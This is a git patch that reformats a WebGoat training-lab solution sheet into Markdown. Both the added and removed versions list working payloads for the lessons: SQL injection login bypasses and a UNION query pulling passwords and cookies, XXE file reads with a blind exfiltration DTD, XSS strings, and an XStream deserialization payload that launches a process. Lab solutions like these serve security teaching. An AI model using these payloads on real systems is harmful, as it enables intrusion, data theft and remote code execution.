From a11e6911cd4761724f36c357fc07d29fc1e7baaf Mon Sep 17 00:00:00 2001
From: Magicansk <30593595+magicansk@users.noreply.github.com>
Date: Thu, 26 Oct 2017 17:07:34 +0800
Subject: [PATCH] Update and rename sol.txt to sol.MD

Add md syntax
---
 webgoat-lessons/sol.MD  | 111 ++++++++++++++++++++++++++++++++++++++++
 webgoat-lessons/sol.txt |  91 --------------------------------
 2 files changed, 111 insertions(+), 91 deletions(-)
 create mode 100644 webgoat-lessons/sol.MD
 delete mode 100644 webgoat-lessons/sol.txt

diff --git a/webgoat-lessons/sol.MD b/webgoat-lessons/sol.MD
new file mode 100644
index 000000000..b7dc5043a
--- /dev/null
+++ b/webgoat-lessons/sol.MD
@@ -0,0 +1,111 @@
+### SQLi ###  
+
+Basic  
+Smith - to show it returns smith's records.    
+To show exploit; `1=1` can be any true clause:  
+
+```sql  
+Smith' or '1'='1   
+```
+
+**Bender Login**  
+```sql
+bender@juice-sh.op' --  
+```
+```sql 
+[2:19 PM]  
+101
+101 or 1=1
+```  
+```sql 
+Smith' union select userid,user_name, password,cookie,cookie, cookie,userid from user_system_data --
+```  
+
+## XXE ##
+
+Simple:  
+```xml 
+<?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><comment><text>&root;</text></comment>  
+```
+
+Modern Rest Framework:  
+Change content type to: `Content-Type: application/xml` and 
+```xml  
+<?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><user>  <username>&root;</username><password>test</password></user>
+```  
+
+Blind SendFile   
+```xml
+  
+      Solution:
+     
+      Create DTD:
+     
+      <pre>
+          <?xml version="1.0" encoding="UTF-8"?>
+          <!ENTITY % file SYSTEM "file:///c:/windows-version.txt">
+          <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8080/WebGoat/XXE/ping?text=%file;'>">
+           %all;
+      </pre>
+     
+      This will be reduced to:
+     
+      <pre>
+          <!ENTITY send SYSTEM 'http://localhost:8080/WebGoat/XXE/ping?text=[contents_file]'>
+      </pre>
+     
+      Wire it all up in the xml send to the server:
+     
+      <pre>
+       <?xml version="1.0"?>
+       <!DOCTYPE root [
+       <!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/XXE/test.dtd">
+       %remote;
+        ]>
+       <user>
+         <username>test&send;</username>
+       </user>
+     
+      </pre>
+     
+     
+```
+
+### XSS ###
+```javascript
+<script>alert('my javascript here')</script>4128 3214 0002 1999
+``` 
+
+DOM-XSS:  
+
+  Something like 
+  `http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere%3Cscript%3Ewebgoat.customjs.phoneHome();%3C%2Fscript%3E
+//`   
+OR  
+`http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere<script>webgoat.customjs.phoneHome();<%2Fscript>`  
+
+### Vuln - Components ###
+
+Jquery page: - it is contrived; but paste that in each box  
+```javascript
+OK<script>alert("XSS")<\/script>
+OK<script>alert("XSS")<\/script>
+```
+for the deserialization:  got to the link: http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/  to read about why it works so you can talk to it.
+```html  
+<sorted-set>  
+ <string>foo</string>
+ <dynamic-proxy>
+   <interface>java.lang.Comparable</interface>
+   <handler class="java.beans.EventHandler">
+     <target class="java.lang.ProcessBuilder">
+       <command>
+         <string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>
+       </command>
+     </target>
+     <action>start</action>
+   </handler>
+ </dynamic-proxy>
+</sorted-set>
+
+```
diff --git a/webgoat-lessons/sol.txt b/webgoat-lessons/sol.txt
deleted file mode 100644
index 0d549b92b..000000000
--- a/webgoat-lessons/sol.txt
+++ /dev/null
@@ -1,91 +0,0 @@
-### SQLi ###
-Basic
-Smith  - to show it returns smith's records
-Smith' or '1'='1    - to show exploit; 1=1 can be any true clause
-
-**Bender Login
-bender@juice-sh.op' --
-
-[2:19 PM]  
-101
-101 or 1=1
-
-Smith' union select userid,user_name, password,cookie,cookie, cookie,userid from user_system_data --
-
-## XXE ##
-
-Simple - <?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><comment><text>&root;</text></comment>
-
-Modern Rest Framework - change content type to: Content-Type: application/xml && 
-<?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><user>  <username>&root;</username><password>test</password></user>
-
-Blind SendFile ...
-
-    /**
-     * Solution:
-     *
-     * Create DTD:
-     *
-     * <pre>
-     *     <?xml version="1.0" encoding="UTF-8"?>
-     *     <!ENTITY % file SYSTEM "file:///c:/windows-version.txt">
-     *     <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8080/WebGoat/XXE/ping?text=%file;'>">
-     *      %all;
-     * </pre>
-     *
-     * This will be reduced to:
-     *
-     * <pre>
-     *     <!ENTITY send SYSTEM 'http://localhost:8080/WebGoat/XXE/ping?text=[contents_file]'>
-     * </pre>
-     *
-     * Wire it all up in the xml send to the server:
-     *
-     * <pre>
-     *  <?xml version="1.0"?>
-     *  <!DOCTYPE root [
-     *  <!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/XXE/test.dtd">
-     *  %remote;
-     *   ]>
-     *  <user>
-     *    <username>test&send;</username>
-     *  </user>
-     *
-     * </pre>
-     *
-     */
-
-###XSS ###
-
-<script>alert('my javascript here')</script>4128 3214 0002 1999
-
-DOM-XSS ...
-
-// something like ... http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere%3Cscript%3Ewebgoat.customjs.phoneHome();%3C%2Fscript%3E
-// or http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere<script>webgoat.customjs.phoneHome();<%2Fscript>
-
-
-### Vuln - Components ###
-
-Jquery page:  - it is contrived; but paste that in each box
-OK<script>alert("XSS")<\/script>
-OK<script>alert("XSS")<\/script>
-
-for the deserialization:  got to the link: http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/  to read about why it works so you can talk to it.
-
-<sorted-set>  
- <string>foo</string>
- <dynamic-proxy>
-   <interface>java.lang.Comparable</interface>
-   <handler class="java.beans.EventHandler">
-     <target class="java.lang.ProcessBuilder">
-       <command>
-         <string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>
-       </command>
-     </target>
-     <action>start</action>
-   </handler>
- </dynamic-proxy>
-</sorted-set>
-
-